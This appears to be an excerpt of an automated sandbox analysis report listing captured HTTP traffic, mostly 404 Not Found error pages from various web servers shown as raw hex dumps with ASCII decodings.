Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 10:27:51 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gziphost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 1037Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 8f e3 34 14 7d 9e fe 0a 6f 10 fb 80 48 d2 96 59 1e 3a 69 57 c3 80 10 12 1f 2b 0d 08 f1 b4 72 e2 db da 33 8e af b1 9d a6 5d b4 ff 9d eb 38 e9 b4 bb b3 80 44 55 a9 ee fd 38 f7 dc 73 6e f5 e2 db 5f ee 7e fd e3 cd 77 4c 86 56 6f 66 55 fc 61 9a 9b dd 3a 03 93 ff 76 9f 6d 66 57 95 04 2e e8 f7 aa 6a 21 70 66 78 0b eb 6c af a0 b7 e8 42 c6 1a 34 01 4c 58 67 bd 12 41 ae 05 ec 55 03 f9 f0 27 fb b0 cb 61 8d c1 9f f5 18 54 46 c0 e1 4b 66 70 8b 5a 63 9f b1 72 68 0a 2a 68 d8 fc 84 41 82 93 88 82 29 c3 e8 cd be e7 4e 80 61 2f 5b c1 bd bc 61 77 d8 2a b3 63 f7 88 a6 2a 53 4f ec f6 8d 53 36 30 ef 9a 75 26 43 b0 ab b2 6c 4f 50 ca d0 6b 37 e0 14 0d b6 65 6f 73 65 1a dd 09 f0 e5 03 7d ff ec c0 1d c7 9f e2 c1 67 9b aa 4c 78 09 3a 1c 35 b0 70 b4 b4 4e 80 43 28 1b 4f 25 5f b0 bf 66 8c 3e 35 1e 72 af de 11 a7 15 bd 69 84 cb 29 74 33 e4 f2 16 df e5 ff 58 d0 43 fd a8 c2 27 6b de cf 66 35 8a e3 34 8a 37 8f 3b 87 9d 11 79 83 1a dd 8a f5 52 05 48 50 63 a4 d6 54 94 22 b8 07 b7 25 81 f3 c3 8a 49 25 68 f9 14 6f b9 db 29 b3 62 f3 01 ff b3 de 71 3b 0e e0 5a ed 4c 4e 90 ad 5f b1 86 ec 02 97 5a 84 f2 56 f3 e3 8a 6d 35 8c d4 1f 3a 1f d4 f6 98 8f c6 5e d6 93 45 b9 04 b5 93 14 5f cc e7 7b 39 8c 2a c6 da 71 5a c4 a2 f4 25 29 de 05 64 af 3e 4f 41 cb 85 18 34 99 a7 ff 51 fd 7c 20 f9 c1 38 7e 48 e7 b7 62 d7 cb b9 4d c2 6d 11 a9 60 9c 35 66 89 cb 04 8d 5e 05 85 04 b4 55 07 10 37 a3 97 21 60 7b 1a a7 61 1b 26 99 46 b4 49 a9 e7 98 c4 0d eb 60 3e 32 eb c2 94 33 0f 55 cb 77 b0 62 06 0d 4c e3 a3 f3 c4 d2 1e 98 47 ad c4 45 63 3c 11 c9 05 f6 e7 2d cf dc 41 e7 7c 0c 59 54 cf f8 a7 8c 56 06 f2 5a e3 84 bb 25 4f e2 ed 11 93 c5 b5 3d 9c 05 fb d1 c0 eb f9 a4 47 6c 3d d9 5a bc 3a 77 2e 0f 68 a3 be 13 c2 c9 ba af 69 99 af 4e e1 4f 39 38 c4 05 34 e8 78 72 e5 69 c5 80 5d 23 73 de a4 78 cb 8d b2 9d 1e aa c6 bc e3 66 f2 92 6b cd e6 c5 d2 33 e0 7e 6c ef 3c b8 dc 83 86 26 9c a3 ee c1 05 d5 70 3d 91 69 95 10 7a cc 0d 6a e6 de f2 66 b0 a7 77 dc 26 77 7d e0 a1 f3 79 0b de 93 75 a3 d1 27 6d 13 f8 fb aa f4 e1 a8 61 33 bb 8a 9f 8a 44 7b 64 0e f4 3a 1b c2 5e 02 84 8c 49 07 db 75 26 43 b0 ab b2 6c 31 48 70 12 91 14 a3 d7 8e d3 19 98 a2 c1 b6 ec 6d de 90 15 24 54 69 75 47 32 fb b2 d6 1d 48 f4 64 0f 5d 8b 75 44 25 4f a9 32 b2 53 4d 49 7d 24 7c ee 11 09 c3 fb d7 fb f5 b2 58 2c 8b e5 22 63 e5 40 aa 2a 25 70 41 cf aa 46 71 8c a1 4a a8 3d 53 62 9d c5 55 b3 54 d4 72 65 58 a3 b9 f7 eb 6c e4 90 8d 3b 5d 8d 1d 63 d6 77 b5 6f 9c b2 d1 82 b7 bd 12 3b 38 55 56 72 b1 b9 65 3f 43 cf 7e 27 b6 6f 22 5b 76 4f e2 be 20 0e 8b 53 cd 72 73 37 70 66 f7 c4 39 a6 96 4f 83 62 01 9f 26 d5 c1
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 10:28:10 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 10:28:13 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 20 Mar 2023 10:28:18 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 837Connection: closeDate: Mon, 20 Mar 2023 10:28:21 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 4c 65 20 66 69 63 68 69 65 72 20 72 65 71 75 69 73 20 6e 27 61 20 70 61 73 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 74 72 6f 75 76 26 65 61 63 75 74 65 3b 2e 0a 49 6c 20 70 65 75 74 20 73 27 61 67 69 72 20 64 27 75 6e 65 20 65 72 72 65 75 72 20 74 65 63 68 6e 69 71 75 65 2e 20 56 65 75 69 6c 6c 65 7a 20 72 26 65 61 63 75 74 65 3b 65 73 73 61 79 65 72 20 75 6c 74 26 65 61 63 75 74 65 3b 72 69 65 75 72 65 6d 65 6e 74 2e 20 53 69 20 76 6f 75 73 20 6e 65 20 70 6f 75 76 65 7a 20 70 61 73 20 61 63 63 26 65 61 63 75 74 65 3b 64 65 72 20 61 75 20 66 69 63 68 69 65 72 20 61 70 72 26 65 67 72 61 76 65 3b 73 20 70 6c 75 73 69 65 75 72 73 20 74 65 6e 74 61 74 69 76 65 73 2c 20 63 65 6c 61 20 73 69 67 6e 69 66 69 65 20 71 75 27 69 6c 20 61 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 73 75 70 70 72 69 6d 26 65 61 63 75 74 65 3b 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta c
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 10:28:23 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 32 61 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /d2a3/ was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 10:28:26 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 32 61 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /d2a3/ was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 10:28:34 GMTContent-Type: application/x-www-form-urlencodedContent-Length: 498Connection: closeLast-Modified: Mon, 01 Dec 2014 15:11:20 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 65 72 72 6f 72 2e 63 73 73 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 3c 2f 68 31 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 68 32 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 3c 70 3e 53 6f 72 72 79 2c 20 74 68 69 73 20 69 73 20 74 68 65 20 76 6f 69 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 50 6f 77 65 72 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 65 72 6c 64 61 6e 63 65 72 2e 6f 72 67 2f 22 3e 44 61 6e 63 65 72 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>Error 404</title><link rel="stylesheet" href="/css/error.css" /><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /></head><body><h1>Error 404</h1><div id="content"><h2>Page Not Found</h2><p>Sorry, this is the void.</p></div><div id="footer">Powered by <a href="http://perldancer.org/">Dancer</a></div></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 10:28:37 GMTContent-Type: text/htmlContent-Length: 498Connection: closeLast-Modified: Mon, 01 Dec 2014 15:11:20 GMTChimera-API-Server: api3.uk.chimera.uk2group.comX-Powered-By: Perl Dancer 1.3513Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 65 72 72 6f 72 2e 63 73 73 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 3c 2f 68 31 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 68 32 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 3c 70 3e 53 6f 72 72 79 2c 20 74 68 69 73 20 69 73 20 74 68 65 20 76 6f 69 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 50 6f 77 65 72 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 65 72 6c 64 61 6e 63 65 72 2e 6f 72 67 2f 22 3e 44 61 6e 63 65 72 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>Error 404</title><link rel="stylesheet" href="/css/error.css" /><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /></head><body><h1>Error 404</h1><div id="content"><h2>Page Not Found</h2><p>Sorry, this is the void.</p></div><div id="footer">Powered by <a href="http://perldancer.org/">Dancer</a></div></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Mon, 20 Mar 2023 10:28:40 GMTConnection: closeContent-Length: 1826Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e e6 97 a0 e6 b3 95 e6 89 be e5 88 b0 e8 b5 84 e6 ba 90 e3 80 82 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 37 65 6d 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 0d 0a 20 20 20 20 20 20 20 20 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 Data Ascii: <!DOCTYPE html><html> <head> <title></title> <meta name="viewport" content="width=device-width" /> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Mon, 20 Mar 2023 10:28:43 GMTConnection: closeContent-Length: 1826Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e e6 97 a0 e6 b3 95 e6 89 be e5 88 b0 e8 b5 84 e6 ba 90 e3 80 82 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 37 65 6d 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 0d 0a 20 20 20 20 20 20 20 20 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 Data Ascii: <!DOCTYPE html><html> <head> <title></title> <meta name="viewport" content="width=device-width" /> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font
